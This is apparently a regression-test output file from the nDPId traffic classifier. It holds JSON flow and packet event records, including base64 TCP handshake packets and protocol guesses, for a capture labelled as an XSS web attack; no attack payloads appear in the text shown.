+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2038,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":2,"flow_last_seen":1499347211522,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347211522,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1f624YVgpio\/XqAScSDlHwAAAgQFtAQCCAoD46eCATnWCwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2039,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":3,"flow_last_seen":1499347211523,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347211523,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06VdAAD4G3ICsEAABwKgKMtX+AFCmKj9etuGFYYAQAOWEJgAAAQEICgE51gwD46eC"} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347078168,"flow_last_seen":1499347083634,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53380,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347078168,"flow_last_seen":1499347083634,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53380,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347079449,"flow_last_seen":1499347084635,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53394,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347079449,"flow_last_seen":1499347084635,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53394,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347080793,"flow_last_seen":1499347086636,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53408,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347080793,"flow_last_seen":1499347086636,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53408,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347082084,"flow_last_seen":1499347087636,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53422,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347082084,"flow_last_seen":1499347087636,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53422,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347083358,"flow_last_seen":1499347088637,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53436,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347083358,"flow_last_seen":1499347088637,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53436,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347084644,"flow_last_seen":1499347090638,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53450,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347084644,"flow_last_seen":1499347090638,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53450,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2057,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347214088,"flow_last_seen":1499347214088,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347214088,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54808,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2057,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":1499347214088,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347214088,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8KIZAAD4GnUqsEAABwKgKMtYYAFAozfALAAAAAKACchCV+wAAAgQFtAQCCAoBOdiNAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2058,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":2,"flow_last_seen":1499347214089,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347214089,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1hgNeWHdKM3wDKAScSB5nQAAAgQFtAQCCAoD46oDATnYjQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":3,"flow_last_seen":1499347214089,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347214089,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0KIdAAD4GnVGsEAABwKgKMtYYAFAozfAMDXlh3oAQAOUYpQAAAQEICgE52I0D46oD"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2066,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347215361,"flow_last_seen":1499347215361,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347215361,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54822,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2066,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":1499347215361,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347215361,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8dFpAAD4GUXasEAABwKgKMtYmAFDVm62RAAAAAKACchAqWwAAAgQFtAQCCAoBOdnLAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2067,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":2,"flow_last_seen":1499347215361,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347215361,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1iYsMlMv1ZutkqAScSD8swAAAgQFtAQCCAoD46tBATnZywEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2068,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":3,"flow_last_seen":1499347215362,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347215362,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0dFtAAD4GUX2sEAABwKgKMtYmAFDVm62SLDJTMIAQAOWbuwAAAQEICgE52csD46tB"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2078,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347216659,"flow_last_seen":1499347216659,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347216659,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54836,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2078,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":1499347216659,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347216659,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8zDVAAD4G+ZqsEAABwKgKMtY0AFD0uxclAAAAAKACchCgVAAAAgQFtAQCCAoBOdsQAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2079,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":2,"flow_last_seen":1499347216659,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347216659,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1jQ3RTmT9LsXJqAScSB\/8QAAAgQFtAQCCAoD46yGATnbEAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2080,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":3,"flow_last_seen":1499347216660,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347216660,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0zDZAAD4G+aGsEAABwKgKMtY0AFD0uxcmN0U5lIAQAOUe+QAAAQEICgE52xAD46yG"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2096,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347219208,"flow_last_seen":1499347219208,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347219208,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54862,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2096,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":1499347219208,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347219208,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UEtAAD4GdYWsEAABwKgKMtZOAFD4043GAAAAAKACchAjBAAAAgQFtAQCCAoBOd2NAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2097,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":2,"flow_last_seen":1499347219208,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347219208,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1k7LcrrD+NONx6AScSDqxQAAAgQFtAQCCAoD468DATndjQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2098,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":3,"flow_last_seen":1499347219209,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347219209,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UExAAD4GdYysEAABwKgKMtZOAFD4043Hy3K6xIAQAOWJzQAAAQEICgE53Y0D468D"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2108,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347220447,"flow_last_seen":1499347220447,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347220447,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54876,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2108,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":1499347220447,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347220447,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86ABAAD4G3c+sEAABwKgKMtZcAFBnOTbDAAAAAKACchAKXgAAAgQFtAQCCAoBOd7DAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2109,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":2,"flow_last_seen":1499347220447,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347220447,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1lzT7Q76Zzk2xKAScSB0OAAAAgQFtAQCCAoD47A5ATnewwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2110,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":3,"flow_last_seen":1499347220448,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347220448,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06AFAAD4G3dasEAABwKgKMtZcAFBnOTbE0+0O+4AQAOUTQAAAAQEICgE53sMD47A5"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2123,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347221694,"flow_last_seen":1499347221694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221694,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54890,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2123,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1499347221694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347221694,"pkt":"ABm5CmnxAMGxFOsxCABFAAA89JJAAD4G0T2sEAABwKgKMtZqAFAcVCtpAAAAAKACchBfVwAAAgQFtAQCCAoBOd\/7AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":2,"flow_last_seen":1499347221695,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347221695,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1mpdkOZGHFQraqAScSBnCgAAAgQFtAQCCAoD47FxATnf+wEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2125,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":3,"flow_last_seen":1499347221695,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347221695,"pkt":"ABm5CmnxAMGxFOsxCABFAAA09JNAAD4G0USsEAABwKgKMtZqAFAcVCtqXZDmR4AQAOUGEgAAAQEICgE53\/sD47Fx"} +00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347033203,"flow_last_seen":1499347101320,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232677,"flow_avg_l4_payload_len":750,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52910,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347087256,"flow_last_seen":1499347092638,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53476,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347087256,"flow_last_seen":1499347092638,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53476,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347088552,"flow_last_seen":1499347093638,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53490,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347088552,"flow_last_seen":1499347093638,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53490,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347091102,"flow_last_seen":1499347096639,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53516,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347091102,"flow_last_seen":1499347096639,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53516,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347092374,"flow_last_seen":1499347097640,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53530,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 